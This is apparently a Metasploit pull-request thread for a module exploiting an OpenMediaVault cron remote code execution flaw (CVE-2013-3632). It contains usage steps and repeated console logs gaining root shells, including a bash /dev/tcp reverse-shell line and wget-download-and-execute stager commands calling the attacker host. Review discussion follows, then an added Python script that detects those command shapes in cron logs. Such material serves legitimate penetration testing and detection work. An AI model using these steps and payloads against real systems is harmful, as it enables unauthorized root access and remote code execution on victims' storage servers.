OpenMediaVault authenticated RCE [CVE-2013-3632]
This is a new module addressing an old vulnerability in OpenMediaVault, an open-source NAS solution.
The vulnerability exists within all OpenMediaVault versions starting from 1.0.0 until the recent release 7.3.1-1 and it allows an authenticated user to create cron jobs as root on the system.
An attacker can abuse this by sending a POST request via rpc.php to schedule and execute a cron entry that runs arbitrary commands as root on the system.
The following releases were tested.
OpenMediaVault x64 appliances:
- openmediavault_1.9_amd64.iso
- openmediavault_2.0.13_amd64.iso
- openmediavault_2.1_amd64.iso
- openmediavault_3.0.2-amd64.iso
- openmediavault_3.0.26-amd64.iso
- openmediavault_3.0.74-amd64.iso
- openmediavault_4.0.9-amd64.iso
- openmediavault_4.1.3-amd64.iso
- openmediavault_5.0.5-amd64.iso
- openmediavault_5.5.11-amd64.iso
- openmediavault_5.6.13-amd64.iso
- openmediavault_6.0-16-amd64.iso
- openmediavault_6.0-34-amd64.iso
- openmediavault_6.0-amd64.iso
- openmediavault_6.0.24-amd64.iso
- openmediavault_6.5.0-amd64.iso
- openmediavault_7.0-20-amd64.iso
- openmediavault_7.0-32-amd64.iso
ARM64 on Raspberry PI running Kali Linux 2024-3:
- openmediavault 7.3.0-5
Installation steps to install the OpenMediaVault NAS appliance
- Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
- Here are the installation instructions for VirtualBox on MacOS.
- Download the OpenMediaVault iso images from here.
- Install the iso image in your virtualization engine.
- When installed, configure the VM appliance to your needs using the menu options.
- Boot up the VM and you should be able to access the OpenMediaVault appliance either thru the console, ssh on port 22 or via the webui via http://your_openmediavault_ip.
You are now ready to test the module.
Verification Steps
- [ ] Start msfconsole
- [ ] use exploit/multi/http/openmediavault_auth_cron_rce
- [ ] set rhosts <ip-target>
- [ ] set rport <port>
- [ ] set lhost <attacker-ip>
- [ ] set target <0=Unix Command, 1=Linux Dropper>
- [ ] exploit
- [ ] you should get a reverse shell or Meterpreter session depending on the payload and target settings
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > info
Name: OpenMediaVault rpc.php Authenticated Cron Remote Code Execution
Module: exploit/multi/http/openmediavault_auth_cron_rce
Platform: Unix, Linux
Arch: cmd, x86, x64, armle, aarch64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2024-05-08
Provided by:
h00die-gr3y <[email protected]>
Brandon Perry <[email protected]>
Mert BENADAM
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
=> 0 Unix Command
1 Linux Dropper
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD openmediavault yes The OpenMediaVault password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The URI path of the OpenMediaVault web application
URIPATH no The URI to use for this exploit (default is random)
USERNAME admin yes The OpenMediaVault username to authenticate with
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload information:
Description:
OpenMediaVault allows an authenticated user to create cron jobs as root on the system.
An attacker can abuse this by sending a POST request via rpc.php to schedule and execute
a cron entry that runs arbitrary commands as root on the system.
All OpenMediaVault versions including the latest release 7.3.1-1 are vulnerable.
References:
https://nvd.nist.gov/vuln/detail/CVE-2013-3632
https://packetstormsecurity.com/files/178526
https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632
View the full module info with the info -d command.
Scenarios
openmediavault_7.0-32-amd64.iso appliance Unix command - cmd/unix/reverse_bash
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set rhosts 192.168.201.6
rhosts => 192.168.201.6
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > check
[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] 192.168.201.6:80 - The target is vulnerable. Version 7.0.pre.32
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target is vulnerable. Version 7.0.pre.32
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[+] Cron payload entry successfully removed.
[*] Command shell session 1 opened (192.168.201.8:4444 -> 192.168.201.6:60814) at 2024-07-03 12:47:54 +0000
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux openmediavault 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
exit
openmediavault_7.0-32-amd64.iso appliance Linux Dropper - linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set target 1
target => 1
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target is vulnerable. Version 7.0.pre.32
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/cYSPpwJI3FXafxL
[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Client 192.168.201.6 (Wget/1.21.3) requested /cYSPpwJI3FXafxL
[*] Sending payload to 192.168.201.6 (Wget/1.21.3)
[*] Sending stage (3045380 bytes) to 192.168.201.6
[+] Cron payload entry successfully removed.
[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.6:44398) at 2024-07-03 12:53:49 +0000
[*] Server stopped.
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : openmediavault.local
OS : Debian 12.5 (Linux 6.1.0-18-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
openmediavault 7.3.0-5 ARM64 Raspberry PI-4 Unix command - cmd/unix/reverse_bash
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set target 0
target => 0
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10
rhosts => 192.168.1.10
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set lhost 192.168.1.8
lhost => 192.168.1.8
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target appears to be vulnerable. Version 7.3.0.pre.5
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[+] Cron payload entry successfully removed.
[*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-01 20:14:07 +0000
pwd
/root
uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
openmediavault 7.3.0-5 ARM64 Raspberry PI-4 Linux Dropper - linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set target 1
target => 1
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10
rhosts => 192.168.1.10
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set lhost 192.168.1.8
lhost => 192.168.1.8
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target appears to be vulnerable. Version 7.3.0.pre.5
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.8:8080/DdVzoLQugqto82
[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Client 192.168.201.10 (Wget/1.21.4) requested /DdVzoLQugqto82
[*] Sending payload to 192.168.201.10 (Wget/1.21.4)
[+] Cron payload entry successfully removed.
[*] Meterpreter session 9 opened (192.168.201.8:4444 -> 192.168.201.10:36792) at 2024-07-01 20:22:02 +0000
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.168.201.10
OS : Debian (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple : aarch64-linux-musl
Meterpreter : aarch64/linux
meterpreter > getuid
Server username: root
meterpreter >
Limitations
Ensure that your WfsDelay advanced option is set to more than 60 seconds to allow cron to execute the payload.
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
Added a small change in the check method for all future versions to check the vulnerability as "Detected" because this weakness has been there since 2013 and never fixed. Future releases will probably not fix it. Contacted the lead developer, but did not get any response 👎
Quick question:
Is the choice to define an exploit as multi based on the OS platform support (Unix, Windows) or driven by the architecture support (ARCH_X64, ARCH_ARMLE, ARCH_AARCH64, etc)? What are the guidelines?
The multi directory (from my understanding) is reserved for modules that will run on both Windows and Linux. I couldn't find where this is explicitly defined in our docs although this discussion supports that understanding:
https://github.com/rapid7/metasploit-framework/pull/18205#issuecomment-1658367849
Thanks for bringing this up, this module should likely be moved to modules/exploits/unix/webapps alongside our other OpenMediaVault exploit.
Great module @h00die-gr3y. Testing was as expected on either end of the affected version range for x64 devices:
openmediavault_7.0-32-amd64.iso
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.199.130:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target is vulnerable. Version 7.0.pre.32
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[!] Cannot access the cron services to remove the payload entry. If required, remove the entry manually.
[+] Cron payload entry successfully removed.
[*] Command shell session 2 opened (172.16.199.1:4444 -> 172.16.199.130:40128) at 2024-07-15 10:00:07 -0700
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.130:40126) at 2024-07-15 10:00:07 -0700
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux openmediavault 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
openmediavault_1.9_amd64.iso
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.199.134:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target is vulnerable. Version 1.9
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[+] Cron payload entry successfully removed.
[*] Command shell session 3 opened (172.16.199.1:4444 -> 172.16.199.130:37626) at 2024-07-15 11:48:39 -0700
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux openmediavault 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
@jheysel-r7 I have moved the module to modules/exploits/unix/webapp/openmediavault_auth_cron_rce.rb and the documentation to documentation/modules/exploit/unix/webapp/openmediavault_auth_cron_rce.rb (see https://github.com/rapid7/metasploit-framework/pull/19298/commits/a9f8475bf56c1a9820d3e5d69988ce6bb060ba71).
I also updated the other module reference exploit/multi/http/openmediavault_cmd_exec to exploit/unix/webapp/openmediavault_cmd_exec (see https://github.com/rapid7/metasploit-framework/pull/19298/commits/5459503dc68a62cf03e54afcc3ab0e9ebc5c126a) to anticipate the upcoming name change for this module. I presume you or your team will do this, right?
@h00die-gr3y just to correct myself the multi directory is for exploits that work on more than two platforms where the platforms are linux, windows, osx, or even android, or java.
I was just looking into moving the openmediavault_cmd_exec module. I did not realize that it exploited the same CVE as this module. I don't think we usually support two different modules that exploit the same CVE but for different versions.
I understand the login functionality differs from versions on either side of 1.0.0 although because the version is easy to detect I would think that we could just refactor the old module to accommodate the different login functionality. Is there any other reason I might not be considering as to why these modules need to be separated?
@jheysel-r7 No worries, I can integrate this logic into this module. Let me work on this the coming days and submit a module that covers all versions. We would then deprecate the old module (openmediavault_cmd_exec). What do you think?
@h00die-gr3y thanks for being so understanding. I would think it would be best to leave the original module and just improve upon it such that we could accommodate the newer versions in the original module.
Ok, so we will keep the same module name openmediavault_cmd_exec but the module will move to unix/webapp and I will integrate the code. We keep this PR open for this exercise, right?
That all sounds perfect, thanks again @h00die-gr3y!
@jheysel-r7 I pushed a new update (see https://github.com/rapid7/metasploit-framework/pull/19298/commits/b65c7ecb0839f683770950e6941246b8f154867f) that now supports all versions of OpenMediaVault starting from the initial version 0.1 until the current release (7.4.2-2). I also checked the original module openmediavault_cmd_exec and after testing it only works for a very limited set of OpenMediaVault versions (in the range of 0.4.x) with only a very few supported payloads.
I am just wondering why we want to keep this original module name in place (it has to be moved anyhow), because it has been a major overhaul (completely new code) and it supports all versions now. You can argue if this is just an update or complete new relaunch? I would say the latter and prefer to keep the new module name intact, launch it as replacement for the original module and decommission the original module. It would probably also make more sense to the end users. What do you think?
Hey @h00die-gr3y thanks for pushing those changes. I had assumed that changing the module name might have some negative implications (although I wasn't sure what those would be exactly). @cdelafuente-r7 has recently educated me on the Msf::Exploit::Deprecated mixin which can be used in this scenario - especially, the moved_from method that adds an alias to the module so that the old name can still be used.
My apologies for the previous requests to leave it as is, you're good to rename and move the module as you see fit 👍
Hi @h00die-gr3y, if I understood correctly, the new module completely replaces the other one without losing compatibility with old versions of the software. If it is the case, you can completely replace the existing module with your module, keeping the author credits as Discovery / first msf module. If you decide to move the module, please use the Msf::Exploit::Deprecated mixin and add the moved_from method to add an alias to the module. Here is an example:
https://github.com/rapid7/metasploit-framework/blob/65c56802388338c523d30e388bc6fcd15eba9270/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb#L18-L20
Thanks for updating this @h00die-gr3y ! Everything looks good to me now. I tested against versions 0.2.3 and 7.0-32, and verified I got a session. I'll go ahead and land it.
Example output:
OpenMediaVault 7.0-32 - target 0 Unix command
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit verbose=true rhosts=192.168.1.229 lhost=192.168.1.13
[+] bash -c '0<&141-;exec 141<>/dev/tcp/192.168.1.13/4444;sh <&141 >&141 2>&141'
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.229:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target appears to be vulnerable. Version 7.0.pre.32
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[+] Cron payload entry successfully removed.
[*] Command shell session 1 opened (192.168.1.13:4444 -> 192.168.1.229:45292) at 2024-07-30 17:10:07 +0200
id
uid=0(root) gid=0(root) groups=0(root)
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:b8:32:ce brd ff:ff:ff:ff:ff:ff
altname enp2s1
inet 192.168.1.229/24 metric 100 brd 192.168.144.255 scope global dynamic ens33
valid_lft 1623sec preferred_lft 1623sec
uname -a
Linux openmediavault 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
OpenMediaVault 7.0-32 - target 1 Linux Dropper
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit verbose=true rhosts=192.168.1.229 lhost=192.168.1.13
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.229:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target appears to be vulnerable. Version 7.0.pre.32
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.1.13:8080/aZ37SHEXKZ2k0
[*] Generated command stager: ["wget -qO /tmp/bXJXLune http://192.168.1.13:8080/aZ37SHEXKZ2k0;chmod +x /tmp/bXJXLune;/tmp/bXJXLune;rm -f /tmp/bXJXLune"]
[*] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Client 192.168.1.229 (Wget/1.21.3) requested /aZ37SHEXKZ2k0
[*] Sending payload to 192.168.1.229 (Wget/1.21.3)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.229
[+] Cron payload entry successfully removed.
[*] Meterpreter session 2 opened (192.168.1.13:4444 -> 192.168.1.229:41730) at 2024-07-30 17:15:01 +0200
[*] Server stopped.
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : openmediavault.local
OS : Debian 12.6 (Linux 6.1.0-18-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
OpenMediaVault 0.2.3 - target 0 Unix command
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit verbose=true rhosts=192.168.1.231 lhost=192.168.1.13
[+] bash -c '0<&118-;exec 118<>/dev/tcp/192.168.1.13/4444;sh <&118 >&118 2>&118'
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.231:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target appears to be vulnerable. Version 0.2.3
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[+] Cron payload entry successfully removed.
[*] Command shell session 3 opened (192.168.1.13:4444 -> 192.168.1.231:59171) at 2024-07-30 17:28:07 +0200
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux openmediavault 2.6.32-5-amd64 #1 SMP Mon Oct 3 03:59:20 UTC 2011 x86_64 GNU/Linux
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:33:88:f9 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.231/24 brd 192.168.144.255 scope global eth0
OpenMediaVault 0.2.3 - target 1 Linux Dropper
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit verbose=true rhosts=192.168.1.231 lhost=192.168.1.13
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.231:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target appears to be vulnerable. Version 0.2.3
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.1.13:8080/WWZawdpN9wUlDn
[*] Generated command stager: ["wget -qO /tmp/INbhZDgX http://192.168.1.13:8080/WWZawdpN9wUlDn;chmod +x /tmp/INbhZDgX;/tmp/INbhZDgX;rm -f /tmp/INbhZDgX"]
[*] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Client 192.168.1.231 (Wget/1.12 (linux-gnu)) requested /WWZawdpN9wUlDn
[*] Sending payload to 192.168.1.231 (Wget/1.12 (linux-gnu))
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.231
[+] Cron payload entry successfully removed.
[*] Meterpreter session 4 opened (192.168.1.13:4444 -> 192.168.1.231:59173) at 2024-07-30 17:32:07 +0200
[*] Server stopped.
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : openmediavault.localdomain
OS : Debian 6.0.3 (Linux 2.6.32-5-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
Release Notes
This adds a new module that leverages a vulnerability in OpenMediaVault versions starting from 1.0 until the recent release 7.4.2-2. This vulnerability (CVE-2013-3632) allows an authenticated user to create cron jobs as root on the system and achieve remote code execution.
Actually it supports versions from 0.2 until recent release.
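Detection-side companion to the output shown in this thread, added here as an example and not part of the PR or the module: because the module removes its cron entry after triggering, the cron execution records in syslog are the more durable evidence, so this scans Debian-style cron `CMD` lines for the two command shapes visible above (a bash `/dev/tcp` redirect, and a fetch / chmod / execute chain). The function names and the sample log lines are constructed for illustration, and it assumes the raw command text appears in the `CMD` record; if the job is wrapped in a script, pass that script's content to `classify` instead.

```python
import re
import shlex

# Debian cron syslog record: "<timestamp> <host> CRON[<pid>]: (<user>) CMD (<command>)"
CRON_CMD = re.compile(r"CRON\[\d+\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)\s*$")
# bash network redirection, the core of the cmd/unix/reverse_bash line in the output above
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/[^/\s;'\"]+/\d+")
# Short-option clusters that name the output file: wget -O / -qO, curl -o / -so
OUTPUT_FLAG = {"wget": re.compile(r"-[A-Za-z]*O$"), "curl": re.compile(r"-[A-Za-z]*o$")}


def _grants_exec(mode):
    """True for symbolic modes containing x (+x, u+x) or octal modes with an execute bit."""
    return "x" in mode or (mode.isdigit() and any(int(d) & 1 for d in mode))


def fetch_exec_chain(command):
    """Return the path that is downloaded, made executable and then run, else None."""
    downloaded, executable = set(), set()
    for stage in re.split(r";|&&|\|\|", command):
        try:
            argv = shlex.split(stage)
        except ValueError:            # naive split cut through a quoted string
            argv = stage.split()
        if not argv:
            continue
        tool = argv[0].rsplit("/", 1)[-1]
        if tool in OUTPUT_FLAG:
            for flag, value in zip(argv[1:], argv[2:]):
                if OUTPUT_FLAG[tool].match(flag):
                    downloaded.add(value)
        elif tool == "chmod" and len(argv) >= 3 and _grants_exec(argv[1]):
            executable.update(p for p in argv[2:] if p in downloaded)
        elif argv[0] in executable:
            return argv[0]
    return None


def classify(command):
    """List the indicator names that apply to one command string."""
    hits = []
    if DEV_TCP.search(command):
        hits.append("dev-tcp-redirect")
    if fetch_exec_chain(command):
        hits.append("fetch-chmod-exec")
    return hits


def scan(lines):
    """Return (user, indicators, command) for every cron CMD record that matches."""
    findings = []
    for line in lines:
        m = CRON_CMD.search(line)
        if not m:
            continue
        command = m.group("cmd").strip()
        hits = classify(command)
        if hits:
            findings.append((m.group("user"), hits, command))
    return findings


# Constructed sample log (documentation addresses), not captured from a real host.
SAMPLE_LOG = [
    "Jul 30 17:09:01 nas CRON[2190]: (root) CMD (   cd / && run-parts --report /etc/cron.hourly)",
    "Jul 30 17:10:01 nas CRON[2211]: (root) CMD (bash -c '0<&141-;exec 141<>/dev/tcp/192.0.2.10/4444;sh <&141 >&141 2>&141')",
    "Jul 30 17:12:01 nas CRON[2240]: (backup) CMD (wget -qO /srv/backup/list.txt http://192.0.2.20/list.txt)",
    "Jul 30 17:15:01 nas CRON[2302]: (root) CMD (wget -qO /tmp/stage http://192.0.2.10:8080/stage;chmod +x /tmp/stage;/tmp/stage;rm -f /tmp/stage)",
    "Jul 30 17:15:02 nas sshd[2310]: Accepted password for admin from 192.0.2.30 port 50122 ssh2",
]

if __name__ == "__main__":
    for user, hits, command in scan(SAMPLE_LOG):
        print(f"{user}: {', '.join(hits)}: {command}")
```

A plain download with no chmod and no execution of the fetched path (the `backup` line) is deliberately not flagged, which keeps ordinary scheduled fetches out of the results.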